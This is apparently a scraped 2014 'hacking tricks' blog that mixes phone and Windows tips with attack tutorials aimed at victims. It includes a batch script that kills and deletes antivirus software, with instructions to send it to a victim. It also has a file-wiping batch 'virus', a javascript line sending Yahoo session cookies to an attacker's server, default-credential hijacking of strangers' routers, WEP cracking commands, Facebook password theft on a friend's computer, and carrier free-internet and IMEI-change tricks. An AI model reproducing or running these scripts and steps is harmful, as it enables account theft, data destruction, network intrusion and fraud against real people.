Wednesday, 9 April 2014

Increase RAM on Android Phone using SD Card



Ram Expender



RAM expander is an application uses part of your SD card as RAM and speed up your phone but you must have the large memory card. You don’t have the large memory card just convert your memory card into 4GB. We already discussed about the article in previous session. Now your memory card is capable to expand your RAM.  Just think SD card can be RAM of your android devices which supports SWAP technology. It included the best features are:
SWAP file RAM expansion up to 4.0GB

·  Free SD card memory as a RAM use
ram increaser for android
· Autorun

· There is no limit on Sap partition
·  Easy foolproof use
· The usual performance degradation when paged not occur with SD card from class 6
· Widget for PNP SWAP
·  Swappiness kernel parameter set
· To support Tung all Android device.

These full featured RAM Expander is compatible for you. But one thing I reveal here. How to check compatible or not?
Before you buy this app, just check that if your android is compatible or not. To verify if your kernel support swap or not. If it ok then proceed next step.

Step 1: download the Apps from Android Market.

Click here to Download Free Version  (this is another app to increase RAM , working process are same)

Step 2: just to follow the guidelines for swapping your android device.

Step 3: in that appearing window, you need to select the language you want when you will open the application for the first time.

Step 4: to choose optimal then click Swap Activ to create SWAP file and to enable it.

Step 5: After it complete, click on the grey box to complete the process and activate SWAP in your android device.


Now ready to access the RAM. You can enjoy all the access with fast speed.try it and enjoy it. Stay tune with as for the technical information.

Run Multiple Accounts in Whatsapp

Before Starting You Need :-
1)A rooted Android device.
2)SwitchMe multiple accounts app
for your rooted Android.
SwitchMe allows you to log in and
out of multiple user Accounts just
as you do on a desktop computer,
with each account having its own
data , apps and settings.
3)WhatsApp for your device
4)Plenty of space on your device
Micro Memory Card Or On Your
Phone memory.
NOTE Perform This trick at your own
risk. You must do this if you want to do
this . Neither me nor the developer is
responsible if anything wrong happens
to your device as running rooted
Android apps are always subjected to
risk factors. Although this trick is
working successfully on my Samsung
Ace . i Suggest you to take backup before performing this trick.
How To Run More Than One WhatsApp
Account On Your Android
After Installing SwitchMe Apps Follow
thes steps Given below :-
Step 1 :- Open the SwitchMe app and
create two different user profiles for
running two different accounts
Of WhatsApp . These user profiles will
have their own own system settings,
apps and data.
Step 2 :- The First user profile you created will work as an Administrator and this account will contain all the apps,settings and data that you are having and running now. This Profile will contain your first WhatsApp Account.
Step 3 :- The second user profile is new ,
and will also have it's own apps,settings and data And it will contain your second WhatsApp account.
Do The Following in the app :-
Switch to this account—> Set up your
phone for this account And Then
—> Open Play Store —> Install/Download
WhatsApp.
Now, register WhatsApp for your second
SIM in this profile.
Done ! That's It :) Now You Are Successfully
Running More Than One WhatsApp
Account On Your Android - See more at: http://www.hackingmodeactivated.blogspot.in/2014/01/run-more-than-one-whatsapp-account-on.html#sthash.cdqnwi7X.dpuf Before Starting You Need :-
Before Starting You Need :-
Before Starting You Need :-
Before Start you need =>

1. A rooted Android device.
2. SwitchMe multiple accounts app for your rooted Android. SwitchMe allows you to log in and
out of multiple user Accounts just as you do on a desktop computer, with each account having its own
data , apps and settings.

3. WhatsApp for your device
4. Plenty of space on your device Micro Memory Card Or On Your Phone memory.

NOTE : Perform This trick at your own risk. You must do this if you want to do
this . Neither me nor the developer is responsible if anything wrong happens
to your device as running rooted Android apps are always subjected to
risk factors. Although this trick is working successfully on my Samsung
Ace . i Suggest you to take backup before performing this trick.

How To Run More Than One WhatsApp Account On Your Android

After Installing SwitchMe Apps Follow thes steps Given below :-
Step 1 :-  Open the SwitchMe app and create two different user profiles for
running two different accounts Of WhatsApp . These user profiles will
have their own own system settings, apps and data.

Step 2 :- The First user profile you created will work as an Administrator and this account will contain all the apps,settings and data that you are having and running now. This Profile will contain your first WhatsApp Account.
Step 3 :- The second user profile is new , and will also have it's own apps,settings and data And it will contain your second WhatsApp account. 

Do The Following in the app :-
--------------------------------
Switch to this account—> Set up your phone for this account And Then
—> Open Play Store —> Install/Download

WhatsApp.
Now, register WhatsApp for your second
SIM in this profile.
Done ! That's It :) Now You Are Successfully
Running More Than One WhatsApp
Account On Your Android

Tuesday, 8 April 2014

How to Make Search Engines to Catch You?



How user behavior affect search engine ranking results is a lot of SEO have been concerned about exploring. Stone at the point a little while ago on the forum to see a lot on the Baidu search results, click on their website, which further improve the ranking discussion. The logic is that the search results a website is more clicks, indicating that the more useful and more users prefer, search engines will further improve the site's ranking. However, this user behavior data is very noisy, very easy to cheat. Search engines want to extract the essence of these data is very difficult.
A few days ago Google employees JohnMu in Google Help forum clearly says , such as clicking on a web site and then immediately point back button, this operation does not affect your site's crawling, indexing and ranking. It's
too easy to cheat, too easy to use by
competitors. This seems like great value, but difficult to extract data also a lot of useful information. Such as bulk spam links to competitors' sites. In the final analysis, to effectively utilize user behavior data, the key lies in how search engines confirm user identity, that accurately identify the specific behavior in the end who did it. If a large number of real users click on your website, stay a very long time, then the ranking certainly beneficial. If the search engines can determine that much of what you click on a person, or a group of people related to you dry, may the opposite effect.
Mass to the opponent, too, the key is who is mass discrimination. I wrote an undetected , more sci-fi and imagining belong. But who would dare to affirm that one day, in the online identity will not be judged by gene to achieve it?
20 years ago, if anyone told me there is Internet, there website, there will be SEO , then I would think it is science fiction. In fact, search engines now have mastered a lot of data that can help
identify user identity. Such as Google can, through cookies, JS script, toolbar, gmail account, Adsense account, Google Analytics account, IP address, user search data such determination and identification of user identity.
1:
If a user logged in gmail account, and then access any with Adsense, Google Analytics , and Google can control any JS script pages, these access data will be recorded. And with Google JS script plethora site right now, aside from the
obvious Adsense, Google Analytics, and now Google has acquired the largest online advertising company DoubleClick, numerous sites have ads all use Google's code. So your every move on the Internet, it is difficult to escape the eyes of Google. If you installed the
Google Toolbar , you visit the site situation is even more clear.
Even if you can extreme abstinence, without a trace, neither any Google Account login, the browser off JS script functions, they do not toolbars. In short you are a ninja who is still no guarantee that search engines can not find me.
For example, if you pass an alliance trading links , this is Google hate thing. Even if you can do stealth, but you can not guarantee this league other people can trace. If this link trading alliance which exposed the identity of some of
the people, and these people look at your site from time to time visit to check they are buying links, your website and your own also revealed the secret.
- See more at: http://www.hackingmodeactivated.blogspot.in/2014/03/how-to-make-search-engines-catch-you.html#sthash.9l6OZHwD.dpuf How user behavior affect search engine ranking results is a lot of SEO have been concerned about exploring. Stone at the point a little while ago on the forum to see a lot on the Baidu search results, click on their website, which further improve the ranking discussion. The logic is that the search results a website is more clicks, indicating that the more useful and more users prefer, search engines will further improve the site's ranking. However, this user behavior data is very noisy, very easy to cheat. Search engines want to extract the essence of these data is very difficult.
20 years ago, if anyone told me there is Internet, there website, there will be SEO , then I would think it is science fiction. In fact, search engines now have mastered a lot of data that can help
identify user identity. Such as Google can, through cookies, JS script, toolbar, gmail account, Adsense account, Google Analytics account, IP address, user search data such determination and identification of user identity.

=> If a user logged in gmail account, and then access any with Adsense, Google Analytics , and Google can control any JS script pages, these access data will be recorded. And with Google JS script plethora site right now, aside from the
obvious Adsense, Google Analytics, and now Google has acquired the largest online advertising company DoubleClick, numerous sites have ads all use Google's code. So your every move on the Internet, it is difficult to escape the eyes of Google. If you installed the
Google Toolbar , you visit the site situation is even more clear.
Even if you can extreme abstinence, without a trace, neither any Google Account login, the browser off JS script functions, they do not toolbars. In short you are a ninja who is still no guarantee that search engines can not find me.
For example, if you pass an alliance trading links , this is Google hate thing. Even if you can do stealth, but you can not guarantee this league other people can trace. If this link trading alliance which exposed the identity of some of
the people, and these people look at your site from time to time visit to check they are buying links, your website and your own also revealed the secret.

Add Background Images to Folders in Windows


=> Steps for adding backgrounds to Folders :-

1. Open Notepad.


2. Copy and paste the following code:-


[{BE098140-A513-11D0-A3A4-00C04FD706EC}] iconarea_image="location of the image"


3. You need to slightly modify this code on Windows Vista and Windows7as the ability to add folder backgrounds has been removed. So,if you use these versions of Windows, install AveFolderBGand then, replace [{BE098140-A513-11D0-A3A4-00C04FD706EC}] with [AveFolder] in the above code. To install this app, extract all the files and then, open the folder according to your installation of Windows (32 bit or 64 bit), right clickinstall.batand selectRun as Administrator.


4. In this code, iconarea_image is the parameter where the location of your image will go.


5. Save the file as desktop.ini.


6. Place this file in the folder where you want your personalized background.


7. On Windows XP, you need to addsystemattribute to the folder where you want a background. To do this, open command promptand execute "attrib +s D:\Music" (without quotes) if "D:\Music" is the location of your folder. If there are spaces in the location of your folder, you need to add double quotes around it. Windows Vista and 7 users need not add system attribute to folders.


8. You might need to log off and log back on for the changes to take effect. Sometimes, AveFolder app fails to work in which case you need to restart Windows Explorer. I recommend you tocreate a System Restore pointin case you do not like the results.
You can hide this desktop.ini file if you feel that it is something that should not be visible in your folder.

It is important to note that the background to your flash drive will only be displayed on computers runningWindows XP(if you have used the code for XP) or those computers runningWindows 7andWindows Vistathat have AveFolderinstalled. Sadly, there is no way to make the background of your flash drive visible on all computers unless you modify your flash drive to automatically install this app on every PC you plug it in.
If this trick does not work for you, do add a comment.

Hack an ADSL Router

Dear friends, today I will show you how to hack ADSL router of others. An ADSL router is also known as a DSL modem. The router is used to connect the computer to the DSL phone line forusing the ADSL service. In a layman's language we simply refer it as modem. In our Kashmir, usually ZTE modems are being used by most of the internet users. Almost 90 percent of users don't know about the Vulnerability of their ADSL modems which can
easily be exploited by hackers.
An ADSL router comes with a username and a password by default by its manufacturer. This default username and password is a major threat to almost all of the internet users. Let us start with the procedure of HACKING OTHER"S DSL MODEM. shall we start:p
1. The first step involved is to see your ip address. As I have already described it, u can go to any of this type of website e.g, www.whatismyipaddress.com or simply the widget on left of the page entitled "Your Details" will display your ip address.


2. Second important step is to download ip scanner, Download it from here.


3. How to use ip scanner. this is very simple;

After You get your ip address,let me start by using my own ip address i.e, 111.68.103.62
When you open ip scanner, you will jave to type the ip address range in the following manner ie,
111.68.102.62 to 111.68.103.69
thus you will scan different ip addresses to see which of them are alive and which are dead.
After u click scan, a list of ip addresses will be displayed, like in figure

Note the ip addresses with blue button are alive and the others displayed are dead.

Type one of the alive ip address in your internet browser's address bar and hit enter.


3. You will be asked for a username and a password. Type "admin" as username and "password" as password and login.
After you login, now you are in the victim's ADSL router, You can edit configurations there and he will not be able to use internet.

Create more than 3,000 folders under a minute

Open your notepad and type
the following code.

@echo off
:top
md %random%
goto top

Save it as 1000.bat

Run it

How to disable/delete your victim's Antivirus?

Here i am giving you the batch program to disable or delete the antivirus in victims computer.

@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --

Copy this code to notepad
Save it with .bat extension(for eg antdis.bat)
send to your victim.

Wi-Fi Hacking using Backtrack.

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgenAvnQCf0ML1vRgTgbHzXBzi5DB-ScWk9Bgd9HH_bXbSJve7xI5JYvf4Y-7P-kGI4gjyIfohuvTquIXdpzZLeZizst6WfeG8WdQW1OvVWi-vTsG5yffLjaZJ2w0NejPMdHxy1ofz1_Mw/s640/.png

First we need to scan for available wireless networks.
There’s this great tool for windows to do this called “NetStumbler”
Or you can use Kismet for Windows and Linux and KisMac for Mac.
The two most common encryption types are:
1) WEP
2) WAP


WEP i.e Wire Equivalent Privacy is not consideres as safe as WAP
i.e Wireless Application Protocol.
WEP have many flaws that allows a hacker to crack a WEP key easily..Whereas WAP is currently the most secure and best option to secure a Wi-Fi network..
It can’t be easily cracked as WEP because the only way to retrieve a
WAP key is to use a brute-force attack or dictionary attack.
Here I’ll tell you how to Crack WEP
To crack WEP we will be using Live Linux distribution called BackTrack to crack WEP.
BackTrack have lots of preinstalled softwares for this very purpose.
The tools we will be using on Backtrack are:
Kismet – a wireless network detector
Airodump – captures packets from a wireless router
Aireplay – forges ARP requests
Aircrack – decrypts the WEP keys


1. First of all we have to find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet. It may ask you for the appropriate adapter which in my case is ath0. You can see your device’s name by typing in the command iwconfig.


2. To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in monitor mode


3. In kismet you will see the flags Y/N/0. Each one stands for a different type of encryption. In our case we will be looking for access points with the WEP encryption. Y=WEP N=OPEN 0=OTHER (usually WAP).


4. Once you find an access point, open a text document and paste in the networks broadcast name (essid), its mac address (bssid) and its channel number. To get the above information, use the arrow keys to select an access point and hit <ENTER>


5. The next step is to start collecting data from the access point with airodump. Open up a new terminal and start airodump by typing in the command:
airodump-ng -c [channel#] -w [filename] –bssid [bssid] [device]
**In the above command airodump-ng starts the program, the channel of your access point goes after -c , the file you wish to output the data goes after -w ,and the MAC address of the access point goes after –bssid. The command ends with the device name.** Make sure to leave out the brackets.


6) Leave the above running and open another terminal. Next we will generate some fake packets to the target access point so that the speed of the data output will increase. Put in the following command:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid] [device]
In the above command we are using the airplay-ng program. The -1 tells the program the specific attack we wish to use which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapters MAC address, -e is the name (essid) of the target access point, and the command ends with the your wireless adapters device name.


7. Now, we will force the target access point to send out a huge amount of packets that we will be able to take advantage of by using them to attempt to crack the WEP key. Once the following command is executed, check your
airodump-ng terminal and you should see the ARP packet count to start to increase. The command is:
aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device]
In this command, the -3 tells the program the specific type of attack which in this case is packet injection, -b is the MAC address of the target access point, -h is your wireless adapters MAC address, and the wireless adapter device name goes at the end.
Once you have collected around 50k-500k packets, you may begin the attempt to break the WEP key. The command to begin the cracking process is:
aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs
In this command the -a 1 forces the program into the WEP attack mode, the –b is the targets MAC address, and the -n 128 tells the program the length of WEP key. If you don’t know the -n , then leave it out. This should crack the WEP key within seconds. The more packets you capture, the bigger chance you have of cracking the WEP key

KEEP YOUR LAPTOP TURNED ON WHILE ITS LID IS CLOSED

Today, I am going to explain you how to keep your laptop ON even while the lid is closed. Read the following steps carefully and do it.                             



1) First, you need to open local group policy editor. (To open Local Group Policy Editor: Open Run [Windows key+ R]. Then type: Gpedit.msc


2) Now go to “Administrative Templates”. (It’s right there. Just under the heading Local Computer Policy.)


3) When you go to Administrative Templates, you will see some options. Choose All settings from the options ( In my laptop, it’s the last option)


4) Are you there yet? If so scroll down until you see “Select the lid switch action(plugged in)”.


5) Go there and change the setting to “Enabled”. Normally it will be in “Not Configured”.


6) Then Change the options in it to “Take no action”. This will make your laptop take no action even if the lid is closed.


Note: This is only in (plugged in). This means if the laptop is not plugged in it may shut down or hibernate. But don’t worry. If you want it to take no action when closed while it’s running on its battery, then do one more change in the settings. For this when you have finished the “Plugged in” Settings (Step 4, 5, 6) close that window and scroll down to see “Select the lid switch action (battery)”. Go there and Follow the Steps 5 and 6.

Enjoy!!!

How to Hack Yahoo Accounts

You Can Hack Yahoo Account by Cookies Stealing or Hijacking From Browser.
Follow Steps and Learn it.
This is very Simple Tutorial and 100% Tested..!!..

Step 1:-
---------
Download the Script From Here

Step 2:-
----------
Download and extract files into your hard drive.

Step 3:-
------------
Create a account in any ftp hosting site i suggested 

www.t35.com
www.1freehosting.com

Step 4:-
-----------
Login to your account and upload 4 files into your ftp account.

Step 5:-
Give this code to victim to run in his browser when he would be

logged in to his yahoo account. Yahoo.php is basically cookie stealing

script and hacked.php executes the stolen cookies in browser.

Stolen cookies get stored in directory 'cookies'

javascript:document.location='http://yourdomain.com/yahoo.php?ex'.concat(escape(document.cookie));

He would again redirected to his yahoo account.

Step :-6
-----------
Open the hacked.php . The password is 'hoc'.

You must have got the username of victim's account. Simply Click on it

and it would take you to inbox of victim's yahoo account without asking for

any password of victim account.

Make Danger Virus which can Shutdown the Computer and delete reboot files

1. Open Notepad Copy this text in that

@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q


2. Then save it as kinng.bat and the batch file is created.

WARNING :: This is the most dangerous virus

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.

REMEMBER – DO NOT CLICK THIS FILE. (for the idiots)

>>Also remember this might not work with vista.<<

TRICKS TO INCREASE ANDROID BATTERY LIFE

Photo: >>TRICKS TO INCREASE ANDROID BATTERY LIFE:-
=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
share us ..... like us ....... (y)

1) Reduce the brightness of your
smartphone or enable the automatic dim option.

2) Reduce the volume of your
smartphone.

3) Turn off your bluetooth when
you're not using it.

4) Turn off your wifi when you're not using the internet

5) Turn off your GPS if you don't need to track your location

6) Turn off the vibration option as this consumes a lot of battery.

7) Use the power saver mode -- most smartphones have this option.

8) disable unused programs as some of these consume high power from CPU.

9) discharge your battery below 20% before recharging it again as this increases battery life.1) Reduce the brightness of your
smartphone or enable the automatic dim option.

2) Reduce the volume of your
smartphone.

3) Turn off your bluetooth when
you're not using it.

4) Turn off your wifi when you're not using the internet

5) Turn off your GPS if you don't need to track your location

6) Turn off the vibration option as this consumes a lot of battery.

7) Use the power saver mode -- most smartphones have this option.

8) disable unused programs as some of these consume high power from CPU.

9) discharge your battery below 20% before recharging it again as this increases battery life.

How to Change IMEI Address in Android without any Software

Changing IMEI Address may be fix Error "Invalid IMEI" after Reset android phone

Enjoy the trick please share this trick because if you go to shop to repair IMEI number error,so you payed 500 rupees

like this post,if you have any help so comment

1. open dialer and type *#*#3646633#*#* wait...

2. now select "cds information" then select "radio information'

3. select "phone 1" and type the code AT+EGMR=1.7.""

4 now see your IMEI number above battery or bill and type into "imei number"

5. now press button "send at command"

then reboot phone .....

NOTE :- please type your original imei number,entering wrong number may be crash your network


Facebook Account Hacking E-Book

"Hacking With Experts 3 (Facebook Hacking)"

Contents :
--------------
A. Facebook Account Hacking
1. Session Hijacking Attack
2. Facebook Security
3. Cookie Stealing Attack
4. Keylogger
5. Clickjacking
6. Tabnapping
7. Remote Administrator Tool
8. Social Engineering Attack
9. Phising
10. Using 3 Friend Attack
11. ARP Poisoning
12. FB Password Decryptor
13. Hacking FB Accounts using Google Dork List
14. FaceBook Fan Page Hacking
15. Desktop Phising

B. Facebook Tips/Tricks
1. Hack Your Friends FB Status
2. Update FB Status With Fake Names
3. USE FB In Hackers Language
4. Stop Unwanted Photo Tags In Timeline
5. How To Change/Update Status Of Someone’s In Facebook
6. Trace Someone In Facebook
7. Post Status To FB By Any Device
8. How To Post In All FB Groups In A Single Click
9. Post Blank Status And Comment In Facebook
10. How to Show who is online on Facebook when you are in
offline mode
11. How To Disable Public Search Of Your FB Profile
12. How to find if somebody hacked your Facebook account
13. How To Track FB Activities
14. How To Flip FB Status Updates
15. How to delete your friends Facebook account in 24 hours
16. Add All Facebook Friends In FB Groups In Single Click
17. Convert Your Any Image Into Facebook Chat Codes
18. How To Convert FB Account Into Fan Pages
19. How To Make Single Name FB Account
20. Insert Profile Picture In FB Account
21. Trick To Edit FB Homepage By JavaScript
22. Change Your Facebook Theme
23. Login Your Too Many FB Accounts In Google Chromeo 


Download it from Here :

Hack Facebook Account with decryptor

Today I am going to tell U all the easiest way to hack facebook account.
For this U will be needing:
1. Pendrive
2. Facebook password decryptor(download it from Here 
Let's start:
copy the facebok pasword decryptor installation file in pendrive
go to cyber where your friend mostly goes install it and click on recover password it recovers password with emails.
Photo: Today I am going to tell U all the easiest way to hack facebook account.
For this U will be needing:
1. Pendrive
2. Facebook password decryptor(download it from here:http://securityxploded.com/getfile_plus.php?id=2222)
Let's start:
copy the facebok pasword decryptor installation file in pendrive
go to cyber where your friend mostly goes install it and click on recover password it recovers password with emails.
PASSWORD HACKED

Types of Trojan virus


1) The Remote Administration Trojan Horse Virus

This type of Trojan horse virus gives hacker behind the malware the possibility to gain control over the infected system. Often the remote administration Trojan horse virus functions without being identified. It can help the hacker to perform different functions including altering the registry, uploading or downloading of files, interrupting different types of communications between the infected computer and other machines.

2) The File Serving Trojan Horse Virus

Trojan horse viruses from this category are able to create a file server on the infected machine. Usually this server is configured as an FTP server and with its help the intruder will be able to control network connections, upload and download various files. These Trojan horse viruses are rather small in size, sometimes not more than 10Kb, which makes it difficult to detect them. They are often attached to emails or hidden in other files that users may download from the Internet. Regularly these Trojan viruses spread with the help of funny forwarded messages that a user receives from friends. Trojan horse viruses may also be hidden in small downloadable games.

3) Distributed Denial of Service Attack Trojan Horse Virus

A lot of computers can be tricked intro installing the Distributed Denial of Service Trojan so that the hacker can gain control over one, several or all computers through a client that is connected with a master server. Using the primary computer within one huge zombie network of machines, hackers are able to sent attacks at particular targets, including companies and websites. They simply flood the target server with traffic, thus making it impossible for simple users to access certain websites or systems. Often these attacks are used to stop the activity of famous brands that could handle different financial demands.

4) Keylogging Trojan Horse Virus

These Trojan horse viruses make use of spyware with the goal of recording every step of user's activity on the computer. They are called keylogging because they transmit to the hacker via email the information about logged and recorded keystrokes. Hackers use this type of malware for their financial benefit (through card fraud or identity theft). Some individuals or companies can offer a great reward for valuable information.

5) The Password Stealing Trojan Horse Virus

The name speaks for itself - Trojans from this category are used to steal passwords. The Trojan transmits information about passwords to the hacker through email. Just like keylogging Trojans, this malware is used mainly for hacker's financial benefit (a lot of people use passwords to access their bank accounts or credit cards).

6) The System Killing Trojan Horse Virus

These Trojans are meant to destroy everything in the system starting with drive Z and ending with drive A. One of the recent Trojan horse viruses of this type is called Trojan.Kill-files.904. The reasons for creating such Trojans are unknown but the results could be catastrophic.
 

Photo: #RiShiPArmar ;) (y)

>>Types of Trojan virus :-
=================
1) The Remote Administration Trojan Horse Virus

This type of Trojan horse virus gives hacker behind the malware the possibility to gain control over the infected system. Often the remote administration Trojan horse virus functions without being identified. It can help the hacker to perform different functions including altering the registry, uploading or downloading of files, interrupting different types of communications between the infected computer and other machines.

2) The File Serving Trojan Horse Virus

Trojan horse viruses from this category are able to create a file server on the infected machine. Usually this server is configured as an FTP server and with its help the intruder will be able to control network connections, upload and download various files. These Trojan horse viruses are rather small in size, sometimes not more than 10Kb, which makes it difficult to detect them. They are often attached to emails or hidden in other files that users may download from the Internet. Regularly these Trojan viruses spread with the help of funny forwarded messages that a user receives from friends. Trojan horse viruses may also be hidden in small downloadable games.

3) Distributed Denial of Service Attack Trojan Horse Virus

A lot of computers can be tricked intro installing the Distributed Denial of Service Trojan so that the hacker can gain control over one, several or all computers through a client that is connected with a master server. Using the primary computer within one huge zombie network of machines, hackers are able to sent attacks at particular targets, including companies and websites. They simply flood the target server with traffic, thus making it impossible for simple users to access certain websites or systems. Often these attacks are used to stop the activity of famous brands that could handle different financial demands.

4) Keylogging Trojan Horse Virus

These Trojan horse viruses make use of spyware with the goal of recording every step of user's activity on the computer. They are called keylogging because they transmit to the hacker via email the information about logged and recorded keystrokes. Hackers use this type of malware for their financial benefit (through card fraud or identity theft). Some individuals or companies can offer a great reward for valuable information.

5) The Password Stealing Trojan Horse Virus

The name speaks for itself - Trojans from this category are used to steal passwords. The Trojan transmits information about passwords to the hacker through email. Just like keylogging Trojans, this malware is used mainly for hacker's financial benefit (a lot of people use passwords to access their bank accounts or credit cards).

6) The System Killing Trojan Horse Virus

These Trojans are meant to destroy everything in the system starting with drive Z and ending with drive A. One of the recent Trojan horse viruses of this type is called Trojan.Kill-files.904. The reasons for creating such Trojans are unknown but the results could be catastrophic.

Airtel Free 3G Internet Trick

This trick working mobile -pc. -Work all 2G-3G
connection.

How to work in opera mini handler:-
---------------------------------------------
-First download operamini handler then fill
below setting

Click here to Download

http://www.datafilehost.com/d/30ba17c0

-Then custom http server as:
202.65.157.201.server4.operamini.com

-Then custom socket server as:
http://202.65.157.201.server4.operamini.com/

-Front Query as:
http://202.65.157.201.t9space.com/power/m/
http/

-Now Save Configuration, and Then Press OK.
For PC users:

-First download KEmulater lite to your PC
http://www.datafilehost.com/d/f3e12ee7

-Install it and download any operamini .jar file
format handler
-Run kmeKEmulater and find your handler and
config with above setting
-Then, Open and Enjoy..

Airtel Free internet Trick 2014 Working 100%

Create Setting like this :-

Name - bk
APN - airtelgprs.com
Proxy - unblockme.us
or
199.195.199.252
or
onlinedailyproxy.com
or
168.144.9.53
Port - 80
hp - buddies.airtelmoney.in .
 

Save this setting and apply. All are working fine
checked by me. And don''t forget 2 comment.